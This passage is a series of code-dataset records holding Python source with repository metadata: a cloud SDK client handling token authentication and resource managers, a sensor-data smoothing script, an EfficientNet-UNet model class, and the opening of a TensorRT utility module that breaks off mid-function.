\"\"\"\n super(Client, self).__init__(timeout, insecure)\n\n self.auth_url = auth_url\n self.username = username\n self.password = password\n self.domain_name = domain_name\n\n self.endpoint_type = endpoint_type\n\n self.set_region(region, zone)\n\n self.default_tenant = None\n self.tenants_info_manager = TenantInfoManager()\n\n self.keypairs = keypairs.KeypairManager(self)\n self.zones = zones.ZoneManager(self)\n self.hosts = hosts.HostManager(self)\n self.wires = wires.WireManager(self)\n self.storages = storages.StorageManager(self)\n\n self.hostwires = hostwires.HostwireManager(self)\n self.hoststorages = hoststorages.HoststorageManager(self)\n\n self.networks = networks.NetworkManager(self)\n self.disks = disks.DiskManager(self)\n\n self.flavors = flavors.FlavorManager(self)\n\n self.guests = guests.GuestManager(self)\n\n self.guestnetworks = guestnetworks.GuestnetworkManager(self)\n self.groupnetworks = groupnetworks.GroupnetworkManager(self)\n self.guestdisks = guestdisks.GuestdiskManager(self)\n\n self.groupguests = groupguests.GroupguestManager(self)\n\n self.usages = usages.UsageManager(self)\n\n self.images = images.ImageManager(self)\n\n self.vncproxy = vncproxy.VNCProxyManager(self)\n\n self.sshrelay = sshrelay.SSHRelayManager(self)\n\n self.logs = logs.LogManager(self)\n\n self.quotas = quotas.QuotaManager(self)\n\n self.scheduler = scheduler.SchedulerManager(self)\n\n self.users = users.UserManager(self)\n self.tenants = tenants.TenantManager(self)\n self.projects = projects.ProjectManager(self)\n self.groups = groups.GroupManager(self)\n self.roles = roles.RoleManager(self)\n self.groupusers = groupusers.GroupuserManager(self)\n\n self.ec2credentials = ec2credentials.EC2CredentialManager(self)\n self.services = services.ServiceManager(self)\n self.endpoints = endpoints.EndpointManager(self)\n\n self.secgroups = secgroups.SecuritygroupManager(self)\n\n self.dns = dnsrecords.DNSRecordManager(self)\n\n self.baremetalagents = baremetalagents.BaremetalAgentManager(self)\n self.baremetals = baremetals.BaremetalManager(self)\n self.baremetalnetworks = baremetalnetworks.BaremetalnetworkManager(self)\n self.baremetalstorages = baremetalstorages.BaremetalstorageManager(self)\n\n self.reservedips = reservedips.ReservedIPManager(self)\n\n self.schedtags = schedtags.SchedtagManager(self)\n self.schedtag_hosts = schedtags.SchedtagHostManager(self)\n\n self.region_stats = RegionStatsManager(self)\n self.metadatas = metadatas.MetadataManager(self)\n self.loadbalancers = loadbalancers.LoadbalancerManager(self)\n self.loadbalancerlisteners = loadbalancers.LoadbalancerListenerManager(self)\n self.loadbalancerlistenerrules = loadbalancers.LoadbalancerListenerRuleManager(self)\n self.loadbalancercertificates = loadbalancers.LoadbalancerCertificateManager(self)\n self.loadbalancerbackendgroups = loadbalancers.LoadbalancerBackendGroupManager(self)\n self.loadbalancerbackends = loadbalancers.LoadbalancerBackendManager(self)\n self.loadbalanceracls = loadbalancers.LoadbalancerAclManager(self)\n\n self.loadbalancerclusters = loadbalancers.LoadbalancerClusterManager(self)\n self.loadbalanceragents = loadbalancers.LoadbalancerAgentManager(self)\n\n def set_region(self, region, zone=None):\n self.region = region\n self.zone = zone\n\n def _authenticatev3(self, project_name=None, project_id=None):\n logging.info('authenticate %s %s' % (project_name, project_id))\n auth = {}\n user = {'name': self.username, 'password': self.password}\n if self.domain_name:\n user['domain'] = {'name': self.domain_name}\n 
else:\n user['domain'] = {'id': 'default'}\n auth['identity'] = {'methods': ['password'],\n 'password': {'user': user}}\n project = {}\n if project_name:\n project['name'] = project_name\n project['domain'] = {'id': 'default'}\n if project_id:\n project['id'] = project_id\n auth['scope'] = {'project': project}\n body = {'auth': auth}\n resp, body = self._json_request(self.auth_url, None,\n 'POST', '/auth/tokens', body=body)\n if 'token' in body:\n token_id = resp['x-subject-token']\n if 'project' in body['token']:\n self.default_tenant = TenantInfo(None, None)\n token = {'id': token_id,\n 'tenant': body['token']['project'],\n 'expires': body['token']['expires_at']}\n catalog = body['token']['catalog']\n user = body['token']['user']\n self.default_tenant.set_access_info(token, catalog, user)\n self.tenants_info_manager.add_tenant(self.default_tenant)\n else:\n self._fetch_tenants(token_id)\n return True\n else:\n raise Exception('Wrong return format %s' % json.dumps(body))\n\n def _authenticate(self, tenant_name=None, tenant_id=None):\n logging.info('authenticate %s %s' % (tenant_name, tenant_id))\n auth = {}\n auth['passwordCredentials'] = {'username': self.username,\n 'password': self.password}\n if tenant_id is not None and len(tenant_id) > 0:\n auth['tenantId'] = tenant_id\n elif tenant_name is not None and len(tenant_name) > 0:\n auth['tenantName'] = tenant_name\n body = {'auth': auth}\n resp, body = self._json_request(self.auth_url, None,\n 'POST', '/tokens', body=body)\n # print json.dumps(body, indent=4)\n if 'access' in body:\n token = body['access']['token']\n catalog = body['access']['serviceCatalog']\n user = body['access']['user']\n if 'tenant' in token:\n self.default_tenant = TenantInfo(None, None)\n # print 'Token:', token\n self.default_tenant.set_access_info(token, catalog, user)\n self.tenants_info_manager.add_tenant(self.default_tenant)\n else:\n self._fetch_tenants(token['id'])\n return True\n else:\n raise Exception('Wrong return format %s' % json.dumps(body))\n return False\n\n def _fetch_tenants(self, token):\n try:\n resp, body = self._json_request(self.auth_url, token,\n 'GET', '/tenants')\n if 'tenants' in body:\n for t in body['tenants']:\n self.tenants_info_manager.add_tenant(TenantInfo(t['id'],\n t['name']))\n return True\n except Exception as e:\n raise Exception('_fetch_tenants %s' % e)\n return False\n\n def get_tenants(self):\n self._authenticate(None, None)\n return self.tenants_info_manager.get_tenants()\n\n def set_project(self, project_name=None, project_id=None):\n return self.set_tenant(tenant_name=project_name, tenant_id=project_id)\n\n def set_tenant(self, tenant_name=None, tenant_id=None):\n tenant = self.tenants_info_manager.get_tenant(tenant_id=tenant_id,\n tenant_name=tenant_name)\n if tenant is None:\n return self._authenticatev3(project_name=tenant_name,\n project_id=tenant_id)\n else:\n self.default_tenant = tenant\n return True\n\n def get_default_tenant(self):\n if self.default_tenant is None:\n raise Exception('No tenant specified')\n # if self.default_tenant.expire_soon():\n # self._authenticate(tenant_name=self.default_tenant.get_name(),\n # tenant_id=self.default_tenant.get_id())\n return self.default_tenant\n\n def get_regions(self):\n t = self.get_default_tenant()\n if t is not None:\n return t.get_regions()\n else:\n return None\n\n def get_endpoint(self, service, admin_api=False, region=None, zone=None):\n t = self.get_default_tenant()\n if t is not None:\n if admin_api:\n ep_type = 'adminURL'\n else:\n ep_type = 
self.endpoint_type\n if region is None:\n region = self.region\n if zone is None:\n zone = self.zone\n return t.get_endpoint(region, service, ep_type, zone=zone)\n else:\n raise Exception('No tenant specified')\n\n def _wrapped_request(self, func, service, admin_api, method, url, **kwargs):\n t = self.get_default_tenant()\n if t is not None:\n ep = self.get_endpoint(service, admin_api)\n if ep is not None:\n ep = self._strip_version(ep)\n return func(ep, t.get_token(), method, url, **kwargs)\n else:\n raise Exception('NO valid endpoint found for %s' % service)\n else:\n raise Exception('No tenant specified')\n\n def json_request(self, service, admin_api, method, url, **kwargs):\n return self._wrapped_request(self._json_request, service, admin_api,\n method, url, **kwargs)\n\n def raw_request(self, service, admin_api, method, url, **kwargs):\n return self._wrapped_request(self._raw_request, service, admin_api,\n method, url, **kwargs)\n\n def get_urllib2_raw_request(self, service, admin_api, url, **kwargs):\n return self._wrapped_request(self._get_urllib2_raw_request, service,\n admin_api, 'GET', url, **kwargs)\n\n def from_file(self, filename):\n with open(filename, 'r') as f:\n desc = f.read()\n self.from_json(json.loads(desc))\n\n def from_json(self, desc):\n self.auth_url = desc['auth_url']\n self.username = desc['username']\n self.endpoint_type = desc['endpoint_type']\n self.set_region(desc['region'], desc.get('zone', None))\n self.tenants_info_manager = TenantInfoManager()\n self.tenants_info_manager.from_json(desc['tenants'])\n if 'default_tenant_id' in desc:\n self.set_tenant(tenant_id=desc['default_tenant_id'])\n\n def to_file(self, filename):\n with open(filename, 'w') as f:\n desc = self.to_json()\n f.write(json.dumps(desc))\n\n def to_json(self):\n desc = {}\n desc['tenants'] = self.tenants_info_manager.to_json()\n desc['username'] = self.username\n desc['auth_url'] = self.auth_url\n desc['region'] = self.region\n if self.zone:\n desc['zone'] = self.zone\n desc['endpoint_type'] = self.endpoint_type\n if self.default_tenant is not None:\n desc['default_tenant_id'] = self.default_tenant.get_id()\n return desc\n\n def is_admin(self):\n tenant = self.get_default_tenant()\n if tenant is not None:\n return tenant.is_admin()\n return False\n\n def is_system_admin(self):\n tenant = self.get_default_tenant()\n if tenant is not None:\n return tenant.is_system_admin()\n return False\n\n", "repo_name": "swordqiu/python_yunionsdk", "sub_path": "yunionclient/api/client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 13847, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 68, "usage_type": "call"}, {"api_name": "yunionclient.common.http.HTTPClient", "line_number": 71, "usage_type": "attribute"}, {"api_name": "yunionclient.common.http", "line_number": 71, "usage_type": "name"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfoManager", "line_number": 91, "usage_type": "call"}, {"api_name": "yunionclient.api.keypairs.KeypairManager", "line_number": 93, "usage_type": "call"}, {"api_name": "yunionclient.api.keypairs", "line_number": 93, "usage_type": "name"}, {"api_name": "yunionclient.api.zones.ZoneManager", "line_number": 94, "usage_type": "call"}, {"api_name": "yunionclient.api.zones", "line_number": 94, "usage_type": "name"}, {"api_name": "yunionclient.api.hosts.HostManager", "line_number": 95, "usage_type": "call"}, {"api_name": "yunionclient.api.hosts", 
"line_number": 95, "usage_type": "name"}, {"api_name": "yunionclient.api.wires.WireManager", "line_number": 96, "usage_type": "call"}, {"api_name": "yunionclient.api.wires", "line_number": 96, "usage_type": "name"}, {"api_name": "yunionclient.api.storages.StorageManager", "line_number": 97, "usage_type": "call"}, {"api_name": "yunionclient.api.storages", "line_number": 97, "usage_type": "name"}, {"api_name": "yunionclient.api.hostwires.HostwireManager", "line_number": 99, "usage_type": "call"}, {"api_name": "yunionclient.api.hostwires", "line_number": 99, "usage_type": "name"}, {"api_name": "yunionclient.api.hoststorages.HoststorageManager", "line_number": 100, "usage_type": "call"}, {"api_name": "yunionclient.api.hoststorages", "line_number": 100, "usage_type": "name"}, {"api_name": "yunionclient.api.networks.NetworkManager", "line_number": 102, "usage_type": "call"}, {"api_name": "yunionclient.api.networks", "line_number": 102, "usage_type": "name"}, {"api_name": "yunionclient.api.disks.DiskManager", "line_number": 103, "usage_type": "call"}, {"api_name": "yunionclient.api.disks", "line_number": 103, "usage_type": "name"}, {"api_name": "yunionclient.api.flavors.FlavorManager", "line_number": 105, "usage_type": "call"}, {"api_name": "yunionclient.api.flavors", "line_number": 105, "usage_type": "name"}, {"api_name": "yunionclient.api.guests.GuestManager", "line_number": 107, "usage_type": "call"}, {"api_name": "yunionclient.api.guests", "line_number": 107, "usage_type": "name"}, {"api_name": "yunionclient.api.guestnetworks.GuestnetworkManager", "line_number": 109, "usage_type": "call"}, {"api_name": "yunionclient.api.guestnetworks", "line_number": 109, "usage_type": "name"}, {"api_name": "yunionclient.api.groupnetworks.GroupnetworkManager", "line_number": 110, "usage_type": "call"}, {"api_name": "yunionclient.api.groupnetworks", "line_number": 110, "usage_type": "name"}, {"api_name": "yunionclient.api.guestdisks.GuestdiskManager", "line_number": 111, "usage_type": "call"}, {"api_name": "yunionclient.api.guestdisks", "line_number": 111, "usage_type": "name"}, {"api_name": "yunionclient.api.groupguests.GroupguestManager", "line_number": 113, "usage_type": "call"}, {"api_name": "yunionclient.api.groupguests", "line_number": 113, "usage_type": "name"}, {"api_name": "yunionclient.api.usages.UsageManager", "line_number": 115, "usage_type": "call"}, {"api_name": "yunionclient.api.usages", "line_number": 115, "usage_type": "name"}, {"api_name": "yunionclient.api.images.ImageManager", "line_number": 117, "usage_type": "call"}, {"api_name": "yunionclient.api.images", "line_number": 117, "usage_type": "name"}, {"api_name": "yunionclient.api.vncproxy.VNCProxyManager", "line_number": 119, "usage_type": "call"}, {"api_name": "yunionclient.api.vncproxy", "line_number": 119, "usage_type": "name"}, {"api_name": "yunionclient.api.sshrelay.SSHRelayManager", "line_number": 121, "usage_type": "call"}, {"api_name": "yunionclient.api.sshrelay", "line_number": 121, "usage_type": "name"}, {"api_name": "yunionclient.api.logs.LogManager", "line_number": 123, "usage_type": "call"}, {"api_name": "yunionclient.api.logs", "line_number": 123, "usage_type": "name"}, {"api_name": "yunionclient.api.quotas.QuotaManager", "line_number": 125, "usage_type": "call"}, {"api_name": "yunionclient.api.quotas", "line_number": 125, "usage_type": "name"}, {"api_name": "yunionclient.api.scheduler.SchedulerManager", "line_number": 127, "usage_type": "call"}, {"api_name": "yunionclient.api.scheduler", "line_number": 127, "usage_type": 
"name"}, {"api_name": "yunionclient.api.users.UserManager", "line_number": 129, "usage_type": "call"}, {"api_name": "yunionclient.api.users", "line_number": 129, "usage_type": "name"}, {"api_name": "yunionclient.api.tenants.TenantManager", "line_number": 130, "usage_type": "call"}, {"api_name": "yunionclient.api.tenants", "line_number": 130, "usage_type": "name"}, {"api_name": "yunionclient.api.projects.ProjectManager", "line_number": 131, "usage_type": "call"}, {"api_name": "yunionclient.api.projects", "line_number": 131, "usage_type": "name"}, {"api_name": "yunionclient.api.groups.GroupManager", "line_number": 132, "usage_type": "call"}, {"api_name": "yunionclient.api.groups", "line_number": 132, "usage_type": "name"}, {"api_name": "yunionclient.api.roles.RoleManager", "line_number": 133, "usage_type": "call"}, {"api_name": "yunionclient.api.roles", "line_number": 133, "usage_type": "name"}, {"api_name": "yunionclient.api.groupusers.GroupuserManager", "line_number": 134, "usage_type": "call"}, {"api_name": "yunionclient.api.groupusers", "line_number": 134, "usage_type": "name"}, {"api_name": "yunionclient.api.ec2credentials.EC2CredentialManager", "line_number": 136, "usage_type": "call"}, {"api_name": "yunionclient.api.ec2credentials", "line_number": 136, "usage_type": "name"}, {"api_name": "yunionclient.api.services.ServiceManager", "line_number": 137, "usage_type": "call"}, {"api_name": "yunionclient.api.services", "line_number": 137, "usage_type": "name"}, {"api_name": "yunionclient.api.endpoints.EndpointManager", "line_number": 138, "usage_type": "call"}, {"api_name": "yunionclient.api.endpoints", "line_number": 138, "usage_type": "name"}, {"api_name": "yunionclient.api.secgroups.SecuritygroupManager", "line_number": 140, "usage_type": "call"}, {"api_name": "yunionclient.api.secgroups", "line_number": 140, "usage_type": "name"}, {"api_name": "yunionclient.api.dnsrecords.DNSRecordManager", "line_number": 142, "usage_type": "call"}, {"api_name": "yunionclient.api.dnsrecords", "line_number": 142, "usage_type": "name"}, {"api_name": "yunionclient.api.baremetalagents.BaremetalAgentManager", "line_number": 144, "usage_type": "call"}, {"api_name": "yunionclient.api.baremetalagents", "line_number": 144, "usage_type": "name"}, {"api_name": "yunionclient.api.baremetals.BaremetalManager", "line_number": 145, "usage_type": "call"}, {"api_name": "yunionclient.api.baremetals", "line_number": 145, "usage_type": "name"}, {"api_name": "yunionclient.api.baremetalnetworks.BaremetalnetworkManager", "line_number": 146, "usage_type": "call"}, {"api_name": "yunionclient.api.baremetalnetworks", "line_number": 146, "usage_type": "name"}, {"api_name": "yunionclient.api.baremetalstorages.BaremetalstorageManager", "line_number": 147, "usage_type": "call"}, {"api_name": "yunionclient.api.baremetalstorages", "line_number": 147, "usage_type": "name"}, {"api_name": "yunionclient.api.reservedips.ReservedIPManager", "line_number": 149, "usage_type": "call"}, {"api_name": "yunionclient.api.reservedips", "line_number": 149, "usage_type": "name"}, {"api_name": "yunionclient.api.schedtags.SchedtagManager", "line_number": 151, "usage_type": "call"}, {"api_name": "yunionclient.api.schedtags", "line_number": 151, "usage_type": "name"}, {"api_name": "yunionclient.api.schedtags.SchedtagHostManager", "line_number": 152, "usage_type": "call"}, {"api_name": "yunionclient.api.schedtags", "line_number": 152, "usage_type": "name"}, {"api_name": "yunionclient.api.stats.RegionStatsManager", "line_number": 154, "usage_type": "call"}, 
{"api_name": "yunionclient.api.metadatas.MetadataManager", "line_number": 155, "usage_type": "call"}, {"api_name": "yunionclient.api.metadatas", "line_number": 155, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerManager", "line_number": 156, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 156, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerListenerManager", "line_number": 157, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 157, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerListenerRuleManager", "line_number": 158, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 158, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerCertificateManager", "line_number": 159, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 159, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerBackendGroupManager", "line_number": 160, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 160, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerBackendManager", "line_number": 161, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 161, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerAclManager", "line_number": 162, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 162, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerClusterManager", "line_number": 164, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 164, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerAgentManager", "line_number": 165, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 165, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 172, "usage_type": "call"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfo", "line_number": 194, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 206, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 209, "usage_type": "call"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfo", "line_number": 226, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 234, "usage_type": "call"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfo", "line_number": 243, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 324, "usage_type": "call"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfoManager", "line_number": 331, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 339, "usage_type": "call"}]}
+{"seq_id": "4852226072", "text": "#!/bin/python\n# cleans sensor data\n# christopher pietsch\nimport sys\nfrom scipy.ndimage import gaussian_filter1d\nimport numpy as np\n \n_i=sys.argv[1]\n_o=sys.argv[2]\n \nf = open(_i, \"r\")\nrl=f.readlines()\n \na=[]\nfor l in rl:\n i = l.split(', ')[1:]\n x=float(i[0])\n y=float(i[1].rstrip('\\n'))\n a.append((x, y))\n \nna=np.array(a)\n \nx, y = na.T\nt = np.linspace(0, 1, len(x))\nt2 = np.linspace(0, 1, 100)\n \nx2 = np.interp(t2, t, x)\ny2 = np.interp(t2, t, y)\nsigma = 10\nx3 = gaussian_filter1d(x2, sigma)\ny3 = gaussian_filter1d(y2, sigma)\n \nx4 = np.interp(t, t2, x3)\ny4 = np.interp(t, t2, y3)\n \nfo=open(_o, 'a')\nfor p in range(len(x3)):\n fo.write(str(x3[p])+\", \"+str(y3[p])+\"\\n\")\n \nfo.close()", "repo_name": "cpietsch/deepsweep", "sub_path": "preprocess/clean.py", "file_name": "clean.py", "file_ext": "py", "file_size_in_byte": 694, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 28, "usage_type": "call"}, {"api_name": "scipy.ndimage.gaussian_filter1d", "line_number": 30, "usage_type": "call"}, {"api_name": "scipy.ndimage.gaussian_filter1d", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 34, "usage_type": "call"}]}
+{"seq_id": "20615300481", "text": "# Copyright (c) 2023, NVIDIA CORPORATION. All rights reserved.\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n\"\"\"EfficientNet Unet model class that takes care of constructing and validating a model.\"\"\"\r\n\r\nimport logging\r\nimport keras\r\nfrom keras.models import Model\r\n\r\nfrom nvidia_tao_tf1.core.templates.efficientnet import EfficientNetB0\r\nfrom nvidia_tao_tf1.cv.unet.model.layers import Conv2DTranspose_block\r\nfrom nvidia_tao_tf1.cv.unet.model.unet_model import UnetModel\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\neff_dict = {'efficientnet_b0': ('block1a_project_bn', 'block2a_project_bn',\r\n 'block3a_project_bn', 'block5a_project_bn')}\r\n\r\n\r\nclass EfficientUnet(UnetModel):\r\n \"\"\"Efficientnet Unet class.\"\"\"\r\n\r\n def __init__(self, *args, **kwargs):\r\n \"\"\"Init function.\r\n\r\n Args:\r\n num_layers (int): Number of layers for scalable feature extractors.\r\n use_pooling (bool): Whether to add pooling layers to the feature extractor.\r\n use_batch_norm (bool): Whether to add batch norm layers.\r\n dropout_rate (float): Fraction of the input units to drop. 0.0 means dropout is\r\n not used.\r\n target_class_names (list): A list of target class names.\r\n freeze_pretrained_layers (bool): Prevent updates to pretrained layers' parameters.\r\n allow_loaded_model_modification (bool): Allow loaded model modification.\r\n template (str): Model template to use for feature extractor.\r\n freeze_bn (bool): The boolean to freeze BN or not.\r\n load_graph (bool): The boolean to laod graph for phase 1.\r\n \"\"\"\r\n super(EfficientUnet, self).__init__(*args, **kwargs)\r\n\r\n def construct_decoder_model(self, encoder_model, export=False):\r\n \"\"\"Construct the decoder for Unet with EfficientNet as backbone.\r\n\r\n Args:\r\n encoder_model (keras.model): keras model type.\r\n export (bool): Set the inference flag to build the\r\n inference model with softmax.\r\n Returns:\r\n model (keras.model): The entire Unet model with encoder and decoder.\r\n \"\"\"\r\n B1, B2, B3, B4 = eff_dict[self.template]\r\n S2 = encoder_model.get_layer(B1).output\r\n S3 = encoder_model.get_layer(B2).output\r\n S4 = encoder_model.get_layer(B3).output\r\n S5 = encoder_model.get_layer(B4).output\r\n skips = [S2, S3, S4, S5]\r\n out = encoder_model.output\r\n for filter_tmp in [512, 256, 128, 64, 32]:\r\n if skips:\r\n skip_to_use = skips.pop()\r\n else:\r\n skip_to_use = None\r\n out = Conv2DTranspose_block(input_tensor=out, filters=filter_tmp,\r\n initializer=\"glorot_uniform\",\r\n skip=skip_to_use,\r\n use_batchnorm=self.use_batch_norm,\r\n freeze_bn=self.freeze_bn)\r\n\r\n out = keras.layers.Conv2D(self.num_target_classes, (1, 1), padding='same',\r\n data_format=\"channels_first\")(out)\r\n if export:\r\n logger.debug(\"Building model for export\")\r\n out = self.get_activation_for_export(out)\r\n\r\n model_unet = Model(inputs=encoder_model.input, outputs=out)\r\n return model_unet\r\n\r\n def 
get_base_model(self, args, kwargs):\r\n \"\"\"Function to construct model specific backbone.\"\"\"\r\n\r\n model_class = EfficientNetB0\r\n kwargs['add_head'] = False\r\n kwargs['input_tensor'] = args[1]\r\n kwargs['stride16'] = True\r\n while args:\r\n args.pop()\r\n\r\n model = model_class(*args, **kwargs)\r\n\r\n return model\r\n", "repo_name": "NVIDIA/tao_tensorflow1_backend", "sub_path": "nvidia_tao_tf1/cv/unet/model/efficientnet_unet.py", "file_name": "efficientnet_unet.py", "file_ext": "py", "file_size_in_byte": 4343, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 25, "usage_type": "call"}, {"api_name": "nvidia_tao_tf1.cv.unet.model.unet_model.UnetModel", "line_number": 32, "usage_type": "name"}, {"api_name": "nvidia_tao_tf1.cv.unet.model.layers.Conv2DTranspose_block", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 81, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 81, "usage_type": "attribute"}, {"api_name": "keras.models.Model", "line_number": 87, "usage_type": "call"}, {"api_name": "nvidia_tao_tf1.core.templates.efficientnet.EfficientNetB0", "line_number": 93, "usage_type": "name"}]}
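construct_decoder_model() above walks the encoder skips from deepest to shallowest, fusing one per 2x upsampling stage. Conv2DTranspose_block itself lives in nvidia_tao_tf1; the standalone Keras sketch below only mirrors its assumed core structure (transposed convolution, optional skip concatenation, batch norm, ReLU) in the same channels-first layout, and is not the TAO implementation:

import keras

def upsample_skip_block(x, filters, skip=None, use_batchnorm=True):
    """Simplified stand-in for Conv2DTranspose_block (assumed structure)."""
    # 2x spatial upsampling via a strided transposed convolution.
    x = keras.layers.Conv2DTranspose(filters, (3, 3), strides=(2, 2),
                                     padding='same',
                                     kernel_initializer='glorot_uniform',
                                     data_format='channels_first')(x)
    if skip is not None:
        # Fuse the encoder feature map of matching spatial size.
        x = keras.layers.Concatenate(axis=1)([x, skip])
    if use_batchnorm:
        x = keras.layers.BatchNormalization(axis=1)(x)
    return keras.layers.Activation('relu')(x)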
+{"seq_id": "70315572647", "text": "import contextlib\nimport json\nimport os\nimport signal\n\nfrom polygraphy import config, mod, util\nfrom polygraphy.common import TensorMetadata\nfrom polygraphy.exception import PolygraphyException\nfrom polygraphy.logger import G_LOGGER, LogMode\n\ntrt = mod.lazy_import(\"tensorrt\")\nnp = mod.lazy_import(\"numpy\")\n\n\nTRT_LOGGER = None\n\n\n@mod.export()\ndef get_trt_logger():\n \"\"\"\n Get the global TensorRT logger created by Polygraphy.\n\n Returns:\n trt.Logger: The TensorRT logger.\n \"\"\"\n global TRT_LOGGER\n\n LoggerType = trt.Logger\n if mod.version(trt.__version__) >= mod.version(\"8.0\"):\n\n class CustomTrtLogger(trt.ILogger):\n def __init__(self):\n trt.ILogger.__init__(self)\n\n def log(self, severity, msg):\n try:\n log_func = {\n # This function cannot throw, so `critical` should not be used here!\n trt.Logger.INTERNAL_ERROR: G_LOGGER.error,\n trt.Logger.ERROR: G_LOGGER.error,\n # Reduce warning spam from TRT.\n trt.Logger.WARNING: lambda msg: G_LOGGER.warning(msg, mode=LogMode.ONCE),\n trt.Logger.INFO: G_LOGGER.verbose,\n trt.Logger.VERBOSE: G_LOGGER.extra_verbose,\n }.get(severity, G_LOGGER.super_verbose)\n\n log_func(msg)\n except KeyboardInterrupt:\n # `log()` is `noexcept` so we need to convert exceptions to signals so that\n # ctrl-C will work as expected.\n os.kill(os.getpid(), signal.SIGTERM)\n\n LoggerType = CustomTrtLogger\n\n if TRT_LOGGER is None:\n TRT_LOGGER = LoggerType()\n return TRT_LOGGER\n\n\ndef _should_use_v3_api():\n return mod.version(trt.__version__) > mod.version(\"8.5.0.9\")\n\n\ndef fail_unavailable(what):\n G_LOGGER.backtrace()\n G_LOGGER.critical(f\"{what} is not available on TensorRT version {trt.__version__}.\")\n\n\ndef check_onnx_parser_errors(parser, success):\n if parser.num_errors > 0:\n for index in range(parser.num_errors):\n G_LOGGER.error(parser.get_error(index))\n G_LOGGER.critical(\"Could not parse ONNX correctly\")\n\n if not success:\n G_LOGGER.critical(\"Failed to parse ONNX model. 
Does the model file exist and contain a valid ONNX model?\")\n\n\ndef get_layer_class_mapping():\n layer_class_mapping = {}\n\n def try_add(layer_type, layer_cls):\n try:\n layer_type = getattr(trt.LayerType, layer_type)\n layer_cls = getattr(trt, layer_cls)\n except AttributeError:\n if config.INTERNAL_CORRECTNESS_CHECKS:\n G_LOGGER.warning(f\"Could not find layer type: {layer_type} or layer class: {layer_cls}\")\n else:\n layer_class_mapping[layer_type] = layer_cls\n\n try_add(\"CONVOLUTION\", \"IConvolutionLayer\")\n try_add(\"FULLY_CONNECTED\", \"IFullyConnectedLayer\")\n try_add(\"ACTIVATION\", \"IActivationLayer\")\n try_add(\"POOLING\", \"IPoolingLayer\")\n try_add(\"LRN\", \"ILRNLayer\")\n try_add(\"SCALE\", \"IScaleLayer\")\n try_add(\"SOFTMAX\", \"ISoftMaxLayer\")\n try_add(\"DECONVOLUTION\", \"IDeconvolutionLayer\")\n try_add(\"CONCATENATION\", \"IConcatenationLayer\")\n try_add(\"ELEMENTWISE\", \"IElementWiseLayer\")\n try_add(\"PLUGIN\", \"IPluginLayer\")\n try_add(\"UNARY\", \"IUnaryLayer\")\n try_add(\"PADDING\", \"IPaddingLayer\")\n try_add(\"SHUFFLE\", \"IShuffleLayer\")\n try_add(\"REDUCE\", \"IReduceLayer\")\n try_add(\"TOPK\", \"ITopKLayer\")\n try_add(\"GATHER\", \"IGatherLayer\")\n try_add(\"MATRIX_MULTIPLY\", \"IMatrixMultiplyLayer\")\n try_add(\"RAGGED_SOFTMAX\", \"IRaggedSoftMaxLayer\")\n try_add(\"CONSTANT\", \"IConstantLayer\")\n try_add(\"RNN\", \"IRNNLayer\")\n try_add(\"RNN_V2\", \"IRNNv2Layer\")\n try_add(\"IDENTITY\", \"IIdentityLayer\")\n try_add(\"PLUGIN_V2\", 